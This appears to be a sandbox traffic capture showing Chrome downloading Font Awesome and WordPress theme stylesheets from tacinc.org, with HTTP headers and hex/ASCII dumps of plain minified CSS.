                                                                                                                                                                                                                              Content-Type: text/css
                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Last-Modified: Thu, 26 Sep 2024 14:04:09 GMT
                                                                                                                                                                                                                              ETag: W/"66f569d9-19475"
                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                              Age: 614818
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8d73a5d42b1e2c89-DFW
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC890INData Raw: 37 64 64 31 0d 0a 2f 2a 21 0a 20 2a 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 46 72 65 65 20 36 2e 35 2e 31 20 62 79 20 40 66 6f 6e 74 61 77 65 73 6f 6d 65 20 2d 20 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 63 6f 6d 0a 20 2a 20 4c 69 63 65 6e 73 65 20 2d 20 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 63 6f 6d 2f 6c 69 63 65 6e 73 65 2f 66 72 65 65 20 28 49 63 6f 6e 73 3a 20 43 43 20 42 59 20 34 2e 30 2c 20 46 6f 6e 74 73 3a 20 53 49 4c 20 4f 46 4c 20 31 2e 31 2c 20 43 6f 64 65 3a 20 4d 49 54 20 4c 69 63 65 6e 73 65 29 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 32 33 20 46 6f 6e 74 69 63 6f 6e 73 2c 20 49 6e 63 2e 0a 20 2a 2f 0a 2e 66 61 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 76 61 72 28 2d 2d 66 61 2d 73 74 79 6c 65
                                                                                                                                                                                                                              Data Ascii: 7dd1/*! * Font Awesome Free 6.5.1 by @fontawesome - https://fontawesome.com * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) * Copyright 2023 Fonticons, Inc. */.fa{font-family:var(--fa-style
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC1369INData Raw: 7d 2e 66 61 2d 31 30 78 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 65 6d 7d 2e 66 61 2d 32 78 73 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 36 32 35 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 2e 31 65 6d 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 2e 32 32 35 65 6d 7d 2e 66 61 2d 78 73 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 35 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 2e 30 38 33 33 33 65 6d 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 2e 31 32 35 65 6d 7d 2e 66 61 2d 73 6d 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 37 35 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 2e 30 37 31 34 33 65 6d 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 2e 30 35 33 35 37 65 6d 7d 2e 66 61 2d 6c 67 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 35 65 6d 3b 6c 69 6e 65 2d 68 65 69
                                                                                                                                                                                                                              Data Ascii: }.fa-10x{font-size:10em}.fa-2xs{font-size:.625em;line-height:.1em;vertical-align:.225em}.fa-xs{font-size:.75em;line-height:.08333em;vertical-align:.125em}.fa-sm{font-size:.875em;line-height:.07143em;vertical-align:.05357em}.fa-lg{font-size:1.25em;line-hei
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC1369INData Raw: 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 2c 31 73 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 2c 69 6e 66 69 6e 69 74 65 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 2c 69 6e 66 69 6e 69 74 65 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 74
                                                                                                                                                                                                                              Data Ascii: animation-duration:var(--fa-animation-duration,1s);-webkit-animation-iteration-count:var(--fa-animation-iteration-count,infinite);animation-iteration-count:var(--fa-animation-iteration-count,infinite);-webkit-animation-timing-function:var(--fa-animation-t
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC1369INData Raw: 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2c 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 34 2c 30 2c 2e 36 2c 31 29 29 7d 2e 66 61 2d 62 65 61 74 2d 66 61 64 65 2c 2e 66 61 2d 66 61 64 65 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 2c 30 73 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 2c 30 73 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65 63 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65 63 74 69 6f 6e 2c 6e 6f 72 6d 61 6c 29 3b 61 6e 69 6d 61
                                                                                                                                                                                                                              Data Ascii: ing-function:var(--fa-animation-timing,cubic-bezier(.4,0,.6,1))}.fa-beat-fade,.fa-fade{-webkit-animation-delay:var(--fa-animation-delay,0s);animation-delay:var(--fa-animation-delay,0s);-webkit-animation-direction:var(--fa-animation-direction,normal);anima
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC1369INData Raw: 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2c 65 61 73 65 2d 69 6e 2d 6f 75 74 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2c 65 61 73 65 2d 69 6e 2d 6f 75 74 29 7d 2e 66 61 2d 73 68 61 6b 65 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 66 61 2d 73 68 61 6b 65 3b 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 66 61 2d 73 68 61 6b 65 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 2c 31 73 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64
                                                                                                                                                                                                                              Data Ascii: iming-function:var(--fa-animation-timing,ease-in-out);animation-timing-function:var(--fa-animation-timing,ease-in-out)}.fa-shake{-webkit-animation-name:fa-shake;animation-name:fa-shake;-webkit-animation-duration:var(--fa-animation-duration,1s);animation-d
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC1369INData Raw: 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 66 61 2d 73 70 69 6e 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65 63 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65 63 74 69 6f 6e 2c 6e 6f 72 6d 61 6c 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65 63 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65 63 74 69 6f 6e 2c 6e 6f 72 6d 61 6c 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 2c 31 73 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 2c 31 73 29 3b
                                                                                                                                                                                                                              Data Ascii: animation-name:fa-spin;-webkit-animation-direction:var(--fa-animation-direction,normal);animation-direction:var(--fa-animation-direction,normal);-webkit-animation-duration:var(--fa-animation-duration,1s);animation-duration:var(--fa-animation-duration,1s);
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC1369INData Raw: 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 20 74 72 61 6e 73 6c 61 74 65 59 28 30 29 7d 31 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 6f 75 6e 63 65 2d 73 74 61 72 74 2d 73 63 61 6c 65 2d 78 2c 31 2e 31 29 2c 76 61 72 28 2d 2d 66 61 2d 62 6f 75 6e 63 65 2d 73 74 61 72 74 2d 73 63 61 6c 65 2d 79 2c 2e 39 29 29 20 74 72 61 6e 73 6c 61 74 65 59 28 30 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 6f 75 6e 63 65 2d 73 74 61 72 74 2d 73 63 61 6c 65 2d 78 2c 31 2e 31 29 2c 76 61 72 28 2d 2d 66 61 2d 62 6f 75 6e 63 65 2d 73 74 61 72 74 2d 73 63 61 6c 65 2d 79 2c 2e 39 29 29 20 74 72 61 6e 73 6c 61 74 65 59 28 30 29 7d 33 30 25 7b 2d 77 65 62 6b 69 74 2d 74
                                                                                                                                                                                                                              Data Ascii: nsform:scale(1) translateY(0)}10%{-webkit-transform:scale(var(--fa-bounce-start-scale-x,1.1),var(--fa-bounce-start-scale-y,.9)) translateY(0);transform:scale(var(--fa-bounce-start-scale-x,1.1),var(--fa-bounce-start-scale-y,.9)) translateY(0)}30%{-webkit-t
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC1369INData Raw: 75 6d 70 2d 73 63 61 6c 65 2d 78 2c 2e 39 29 2c 76 61 72 28 2d 2d 66 61 2d 62 6f 75 6e 63 65 2d 6a 75 6d 70 2d 73 63 61 6c 65 2d 79 2c 31 2e 31 29 29 20 74 72 61 6e 73 6c 61 74 65 59 28 76 61 72 28 2d 2d 66 61 2d 62 6f 75 6e 63 65 2d 68 65 69 67 68 74 2c 2d 2e 35 65 6d 29 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 6f 75 6e 63 65 2d 6a 75 6d 70 2d 73 63 61 6c 65 2d 78 2c 2e 39 29 2c 76 61 72 28 2d 2d 66 61 2d 62 6f 75 6e 63 65 2d 6a 75 6d 70 2d 73 63 61 6c 65 2d 79 2c 31 2e 31 29 29 20 74 72 61 6e 73 6c 61 74 65 59 28 76 61 72 28 2d 2d 66 61 2d 62 6f 75 6e 63 65 2d 68 65 69 67 68 74 2c 2d 2e 35 65 6d 29 29 7d 35 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61
                                                                                                                                                                                                                              Data Ascii: ump-scale-x,.9),var(--fa-bounce-jump-scale-y,1.1)) translateY(var(--fa-bounce-height,-.5em));transform:scale(var(--fa-bounce-jump-scale-x,.9),var(--fa-bounce-jump-scale-y,1.1)) translateY(var(--fa-bounce-height,-.5em))}50%{-webkit-transform:scale(var(--fa
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC1369INData Raw: 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 33 64 28 76 61 72 28 2d 2d 66 61 2d 66 6c 69 70 2d 78 2c 30 29 2c 76 61 72 28 2d 2d 66 61 2d 66 6c 69 70 2d 79 2c 31 29 2c 76 61 72 28 2d 2d 66 61 2d 66 6c 69 70 2d 7a 2c 30 29 2c 76 61 72 28 2d 2d 66 61 2d 66 6c 69 70 2d 61 6e 67 6c 65 2c 2d 31 38 30 64 65 67 29 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 33 64 28 76 61 72 28 2d 2d 66 61 2d 66 6c 69 70 2d 78 2c 30 29 2c 76 61 72 28 2d 2d 66 61 2d 66 6c 69 70 2d 79 2c 31 29 2c 76 61 72 28 2d 2d 66 61 2d 66 6c 69 70 2d 7a 2c 30 29 2c 76 61 72 28 2d 2d 66 61 2d 66 6c 69 70 2d 61 6e 67 6c 65 2c 2d 31 38 30 64 65 67 29 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 2d 66 6c 69 70 7b 35 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a
                                                                                                                                                                                                                              Data Ascii: -transform:rotate3d(var(--fa-flip-x,0),var(--fa-flip-y,1),var(--fa-flip-z,0),var(--fa-flip-angle,-180deg));transform:rotate3d(var(--fa-flip-x,0),var(--fa-flip-y,1),var(--fa-flip-z,0),var(--fa-flip-angle,-180deg))}}@keyframes fa-flip{50%{-webkit-transform:
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC1369INData Raw: 67 29 7d 32 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 32 32 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 32 32 64 65 67 29 7d 33 32 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 2d 31 32 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 2d 31 32 64 65 67 29 7d 33 36 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 32 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 32 64 65 67 29 7d 34 30 25 2c 74 6f 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 64 65 67 29 7d 7d 40 2d 77 65 62 6b 69 74
                                                                                                                                                                                                                              Data Ascii: g)}20%{-webkit-transform:rotate(22deg);transform:rotate(22deg)}32%{-webkit-transform:rotate(-12deg);transform:rotate(-12deg)}36%{-webkit-transform:rotate(12deg);transform:rotate(12deg)}40%,to{-webkit-transform:rotate(0deg);transform:rotate(0deg)}}@-webkit


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              74192.168.2.649806141.193.213.104431424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC579OUTGET /wp-content/themes/socialdriver/css/style-spb.min.css HTTP/1.1
                                                                                                                                                                                                                              Host: www.tacinc.org
                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                                                                                                              Referer: https://www.tacinc.org/
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC479INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:07 GMT
                                                                                                                                                                                                                              Content-Type: text/css
                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Last-Modified: Thu, 26 Sep 2024 14:03:23 GMT
                                                                                                                                                                                                                              ETag: W/"66f569ab-a4b55"
                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                              Age: 614818
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8d73a5d49ead0c1b-DFW
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC890INData Raw: 37 64 64 31 0d 0a 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 30 32 35 70 78 29 7b 2e 61 6e 69 6d 61 74 65 2d 68 69 64 65 2c 2e 61 6e 69 6d 61 74 65 2d 73 68 6f 77 2c 2e 6d 65 67 61 6e 61 76 2d 77 72 61 70 2c 61 2c 62 6f 64 79 20 61 62 62 72 7b 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 2e 32 73 20 65 61 73 65 2d 69 6e 2d 6f 75 74 21 69 6d 70 6f 72 74 61 6e 74 3b 2d 6d 6f 7a 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 2e 32 73 20 65 61 73 65 2d 69 6e 2d 6f 75 74 21 69 6d 70 6f 72 74 61 6e 74 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 2e 32 73 20 65 61 73 65 2d 69 6e 2d 6f 75 74 21 69 6d 70 6f 72 74 61 6e 74 3b 2d 6f 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c
                                                                                                                                                                                                                              Data Ascii: 7dd1@charset "UTF-8";@media (min-width:1025px){.animate-hide,.animate-show,.meganav-wrap,a,body abbr{transition:all .2s ease-in-out!important;-moz-transition:all .2s ease-in-out!important;-webkit-transition:all .2s ease-in-out!important;-o-transition:al
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC1369INData Raw: 62 30 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 70 72 30 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 70 6c 30 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 62 74 30 7b 62 6f 72 64 65 72 2d 74 6f 70 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 62 62 30 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 6f 2d 73 68 61 64 6f 77 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 70 6d
                                                                                                                                                                                                                              Data Ascii: b0{padding-bottom:0!important}.pr0{padding-right:0!important}.pl0{padding-left:0!important}.bt0{border-top:0!important}.bb0{border-bottom:0!important}.no-shadow{-webkit-box-shadow:none!important;-moz-box-shadow:none!important;box-shadow:none!important}.pm
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC1369INData Raw: 75 6c 6c 2d 77 69 64 74 68 20 73 65 63 74 69 6f 6e 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 31 30 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 2e 73 70 62 2d 72 6f 77 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 62 6c 6f 67 2d 69 74 65 6d 73 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 30 21 69 6d 70 6f 72 74 61 6e 74 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 73 70 62 2d 72 6f 77 2d 63 6f 6e 74 61 69 6e 65 72 3e 64 69 76 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7a 2d 69 6e 64 65 78 3a 33 7d 2e 73 70 62 2d 72 6f 77 2d 63 6f 6e 74 61 69 6e 65 72 3e 64 69 76 3e 73 65 63 74 69 6f 6e 2e 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 78 2d 77 69 64 74 68
                                                                                                                                                                                                                              Data Ascii: ull-width section.container{width:100%;max-width:100%;overflow:hidden}.spb-row-container .blog-items{padding-bottom:0!important;margin-bottom:0!important}.spb-row-container>div{position:relative;z-index:3}.spb-row-container>div>section.container{max-width
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC1369INData Raw: 61 6e 3a 62 65 66 6f 72 65 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 38 30 64 65 67 29 20 74 72 61 6e 73 6c 61 74 65 33 64 28 30 2c 30 2c 30 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 38 30 64 65 67 29 20 74 72 61 6e 73 6c 61 74 65 33 64 28 30 2c 30 2c 30 29 7d 2e 73 70 62 2d 72 6f 77 2d 65 78 70 61 6e 64 2d 74 65 78 74 2e 72 6f 77 2d 6f 70 65 6e 3a 68 6f 76 65 72 20 61 3a 68 6f 76 65 72 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 38 30 64 65 67 29 20 74 72 61 6e 73 6c 61 74 65 33 64 28 30 2c 30 2c 30 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 38 30 64 65 67 29 20 74 72 61 6e 73 6c 61 74 65 33 64 28 30 2c 30 2c 30 29 7d 2e 73 70 62 2d 72 6f 77 2d
                                                                                                                                                                                                                              Data Ascii: an:before{-webkit-transform:rotate(180deg) translate3d(0,0,0);transform:rotate(180deg) translate3d(0,0,0)}.spb-row-expand-text.row-open:hover a:hover{-webkit-transform:rotate(180deg) translate3d(0,0,0);transform:rotate(180deg) translate3d(0,0,0)}.spb-row-
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC1369INData Raw: 69 6e 65 72 20 2e 72 6f 77 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 73 70 62 2d 72 6f 77 2d 63 6f 6e 74 61 69 6e 65 72 5b 64 61 74 61 2d 62 6f 74 74 6f 6d 2d 73 74 79 6c 65 3d 73 6c 61 6e 74 2d 6c 74 72 5d 2c 2e 73 70 62 2d 72 6f 77 2d 63 6f 6e 74 61 69 6e 65 72 5b 64 61 74 61 2d 62 6f 74 74 6f 6d 2d 73 74 79 6c 65 3d 73 6c 61 6e 74 2d 72 74 6c 5d 2c 2e 73 70 62 2d 72 6f 77 2d 63 6f 6e 74 61 69 6e 65 72 5b 64 61 74 61 2d 74 6f 70 2d 73 74 79 6c 65 3d 73 6c 61 6e 74 2d 6c 74 72 5d 2c 2e 73 70 62 2d 72 6f 77 2d 63 6f 6e 74 61 69 6e 65 72 5b 64 61 74 61 2d 74 6f 70 2d 73 74 79 6c 65 3d 73 6c 61 6e 74 2d 72 74 6c 5d 7b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 2e 73 70 62 2d 72 6f 77 2d 63 6f 6e 74 61 69 6e 65 72
                                                                                                                                                                                                                              Data Ascii: iner .row{padding-left:0!important}.spb-row-container[data-bottom-style=slant-ltr],.spb-row-container[data-bottom-style=slant-rtl],.spb-row-container[data-top-style=slant-ltr],.spb-row-container[data-top-style=slant-rtl]{overflow:hidden}.spb-row-container
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC1369INData Raw: 6c 61 6e 74 2d 72 74 6c 5d 3a 61 66 74 65 72 7b 63 6f 6e 74 65 6e 74 3a 22 22 3b 77 69 64 74 68 3a 31 32 30 25 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 31 34 30 70 78 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 2d 33 64 65 67 29 3b 2d 6d 6f 7a 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 2d 33 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 2d 33 64 65 67 29 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 31 30 25 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 2d 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 7a 2d 69 6e 64 65 78 3a 32 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 2d 77 65 62 6b 69 74 2d 62 61
                                                                                                                                                                                                                              Data Ascii: lant-rtl]:after{content:"";width:120%;display:block;height:140px;-webkit-transform:rotate(-3deg);-moz-transform:rotate(-3deg);transform:rotate(-3deg);background:#fff;margin-left:-10%;margin-bottom:-100px;margin-top:0;z-index:2;position:relative;-webkit-ba
                                                                                                                                                                                                                              2024-10-23 18:04:07 UTC1369INData Raw: 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 38 30 64 65 67 29 20 74 72 61 6e 73 6c 61 74 65 33 64 28 30 2c 30 2c 30 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 38 30 64 65 67 29 20 74 72 61 6e 73 6c 61 74 65 33 64 28 30 2c 30 2c 30 29 7d 2e 73 70 62 5f 61 63 63 6f 72 64 69 6f 6e 20 2e 73 70 62 5f 61 63 63 6f 72 64 69 6f 6e 5f 73 65 63 74 69 6f 6e 3e 68 34 20 61 3e 69 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 31 30 70 78 7d 2e 73 70 62 5f 61 63 63 6f 72 64 69 6f 6e 20 2e 73 70 62 5f 61 63 63 6f 72 64 69 6f 6e 5f 73 65 63 74 69 6f 6e 3e 68 34 20 61 3e 69 5b 63 6c 61 73 73 2a 3d 73 73 2d 5d 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 76 65 72 74 69 63 61 6c 2d 61 6c
